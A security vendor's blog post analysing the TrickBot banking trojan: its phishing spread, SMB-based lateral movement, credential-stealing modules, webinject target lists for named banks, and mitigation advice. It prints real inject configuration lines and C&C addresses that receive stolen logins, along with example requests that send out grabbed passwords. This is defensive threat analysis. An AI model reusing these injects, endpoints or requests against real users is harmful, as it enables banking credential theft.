Blog

TrickBot – Today’s Top Banking Trojan

posted by: FraudWatch International date: Jan 30, 2020 category: Expert Explanations, Malware comments: 0

TrickBot, a banking trojan that has been infecting victims since 2016, is considered by many cybersecurity experts to be one of the top threats targeting businesses. So far, TrickBot has compromised over 250 million email accounts.

TrickBot usually propagates via spear phishing emails; typically, using weaponized Microsoft Word or Excel attachments, pretending to be invoices or resumés. It also spreads by being downloaded by other banking trojans such as IcedID and Emotet as a secondary payload.

Once installed on the victim’s network, it quickly spreads throughout an enterprise infrastructure by exploiting vulnerabilities in the server message block (SMB) protocol. It creates persistence on an infected system by using Window’s Scheduled Task.

TrickBot has a meticulously composed target list (see below). Originally, TrickBot focused on North America and Europe, but then expanded its target list to include banks in Australia and Asia. It now targets banks all around the world. In fact, its target list is about ten to twenty times as long as other banking trojans.

The primary targets of TrickBot are located in USA, for example USAA (United Services Automobile Association an insurance and financial services provider located in Texas, U.S.A.):

<dinj> // Dynamic INJection

<lm>https://www.usaa.com/inet/ent_accounts/EntManageAccounts*</lm>
// URL fragment (if open in browser, Bot will try to steal credentials)

<hl>https://66.55.71.12:446/response.php?s=1545235830343997&id=oSzg21Bl1KPRVwjr8CNr</hl>
// Where it is going to post logins/etc stolen

It also targets “major” companies like Amazon:

<dinj>

<lm>https://sellercentral.amazon.com/payments/reports/statement/details*</lm>

Or PayPal:

<lm>https://www.paypal.com/mep/dashboard*</lm>

Trickbot also extends its interest to European companies:

<lm>*securebank.santander*.de/EBANDE*/BtoChannelDriver*</lm>

<lm>*commerzbank.de/</lm>

<lm>https://secure.halifax-online.co.uk/personal/a/logon/entermemorableinformation.jsp*</lm>

The list of “targets” is not static. From time to time, TrickBot probes new regions. For instance, around 15th August 2018 it started to target Australian banks:

<mm>https://banking.westpac.com.au*</mm> <sm>https://banking.westpac.com.au/wbc/banking/handler*</sm>

<mm>https://ib-auth.delphibank.com.au*</mm>

<sm>https://ib-auth.delphibank.com.au/Account/Login*</sm>

<mm>https://inetbnkp.adelaidebank.com.au*</mm>

While TrickBot is still targeting a few Australian banks (a recent case was seen on 12th December 2019 for Commonwealth Bank of Australia):

<lm>https://*.my.commbank.com.au/netbank/PaymentHub/MakePayment.aspx*sn-transfers-bpay</lm>

<hl>http://198.46.161.196:2020/q1MPVi7phg/getinj/hYduOVpZwD</hl>

TrickBot dropped most of the Australian banks from its target list. This could be due to an increase in probes in Japan (from approximately 22th October 2019 – present):

<lm>https://ib.resonabank.co.jp/IB/Js/template.js</lm>

<lm>https://www12.ib.shinkin-ib.jp/est/webfb/fb/js/cookie.js</lm>

<lm>https://direct.ib.hirogin.co.jp/HRIK01/cck/forms/IKP/emusc_IK.js?*</lm>

TrickBot uses a wide spectrum of modules to steal all kinds of credentials, including network passwords.

Some of the modules and methods TrickBot employs are:

  • A dynamic webinject it uses against financial institutions (injectDll32/injectDll64).
  • Collecting system information of infected device such as CPU, OS, and memory information; user accounts; and lists of installed programs and services and sending these to the C&C server (systeminfo32/systeminfo64).
  • Gathering network information of the infected system and sending it to C&C server (networkDll32/networkDll64).
  • A “password grabber” module which steals credentials from applications like Filezilla, Microsoft Outlook and WinSCP (pwgrab32/pwgrab64).
  • Targeting point-of-sale (PoS) systems (psfin32/psfin64).
  • Stealing browser data such as cookies, browsing history, browser configuration (importDll32/importDll64).
  • Stealing additional credentials to move lateral and further exploit the infected system (tabDll32/tabDll64).
  • A module that searches through the files of an infected machine to collect email address to spread to via new spam massages (mailsearcher32/mailsearcher64).
  • A worm module, allowing TrickBot to move laterally within an infected network via EternalBlue (MS17-010), Eternal Romance and EternalChampion exploits (mwormDll32/mwormDll64).
  • For lateral movement, downloading a TrickBot loader from a URL, propagating the loader to network shares connected to the affected machine, and installing the loader as a service for persistence (mshareDll32/mshareDll64).

As shown above, TrickBot does not just simply inject into browser sessions and listen to traffic; it actually starts its malicious activities by scanning the computer (mail agents, browser data…).  This means that even if a user of an infected system has not visited any of the “target websites”, valuable information has probably been sent to the C&C server.

Mitigation recommendations:

FraudWatch International recommends the following steps be taken by businesses to protect against being infected by the TrickBot trojan:

  • Train: Every employee should be trained on recognizing phishing and spear-phishing, as this is the primary infection vector not only for TrickBot, but also for many other malware programs.
  • Update: Ensure that all devices and software applications, especially antivirus and antimalware programs, are up-to-date and patched.
  • Monitor: Use filters to identify malicious emails and monitor the network for suspicious traffic or attempts to communicate with blacklisted IPS.
  • Access: Disable macros, prohibit external application downloads and prevent non-whitelisted URLs from being accessed.

Appendix 1. Some specifics of TrickBot’s behaviour

Once TrickBot’s module gets control, it installs itself into the system. For example, in order to be persistent, it creates new Windows Task.

Location (example): “C:\Windows\System32\Tasks\Command cache application” // E.g. it tries to look like “typical” Windows application.

Task content:

<Task version=”1.2″ xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/task”>

<Command>C:\Users\<UserName>\AppData\Roaming\cmdcache\aDEb.exe</Command>

 

TrickBot slightly changes its original name, for example “radia.exe” to “tadia.exe”.

It waits several minutes prior to the first connection to its server (which is not long compared to other trojans) and sends requests to its command and control server (C&C).  For example:

GET https://181.140.173.186:449/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/5/spk/ HTTP/1.1

Connection: Keep-Alive

Server -> HTTP/1.1 200 OK

Server -> Server: nginx/1.10.3

Server -> …<Encrypted Response>

In the above example, “mor51” is the Tag (or current “campaign name”), e.g. its C&C server sees which generation of bot obtained control.

More examples of “tags”:

– “mor63”, “mor58”, “mor43”, … “tot597” (around 29.10.2019), “mango21”, …

 

<Encrypted Response> – if decrypted (SHA 256 bits + AES 256 bits) would be like:

 

<expir>1577739600</expir>

</ssert>

Next, TrickBot sends information about the infected system. For example:

GET https://181.140.173.186:449/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/0/Windows%207%20×86%20SP1/1079/<Infected Machine’s IP address>/893F0845BDAE1F2BD91BCFAE506A3A947D99A541A49436A6B4D0DB1FC4F0A801/…

Then sends a request for modules. Typically, the first module is a password-stealer:

https://194.5.250.121:447/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/5/pwgrab32/

The server responds with (encrypted) “pwgrab32” module. This module is not specific, it will “grab” all possible passwords from infected machine and send them to C&C:

POST https://181.140.173.186:449/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/64/pwgrab/DEBG/browser/ HTTP/1.1

The Chrome webdata db file is copied.

importDll32

injectDll32

mshareDll32

mwormDll32

networkDll32

pwgrab32

systeminfo32

tabDll32

As you can see, TrickBot has a full array of “functions” to steal information and exploit systems, including Shared drives, etc.

Finally, TrickBot will download its WEB Injector module (“injectDll32”) and configuration files:

<DIR> injectDll32_configs

<DIR> networkDll32_configs

<DIR> pwgrab32_configs

“injectDll32_configs” contains settings which are descriptors for its targets. Most targets are banks (approximately 100 different banks from many countries). The most recent update of the target list was made around 22th October 2019, and there now seems to be a focus on Japanese banks:

<dinj>

<lm>https://ib.hokkokubank.co.jp/HKIK01/cck/forms/IKP/HkBank2_PC.js?*</lm>

<hl>https://192.3.104.55:446/response.php?s=1571300200126636&id=10TxNhb0Y06Fu2sHXnOC</hl>

<pri>100</pri>

<sq>2</sq>

</dinj>

At FraudWatch International, we monitor activity for numerous trojans, including TrickBot, and we detect the latest changes and new targets.  As part of our Anti-Malware service, we can take down the IPs responsible, therefore disabling TrickBot’s ability to send harvested credentials back to criminals.

Taking down C&C IPs works even if the trojans remain undetected on infected machines.  Due to our constant monitoring services, we detect the latest changes (IPs and targets), as soon as the criminals start to push out their new campaigns.

If you think Anti-Malware services could assist your business, don’t hesitate to contact us.

Comments are closed.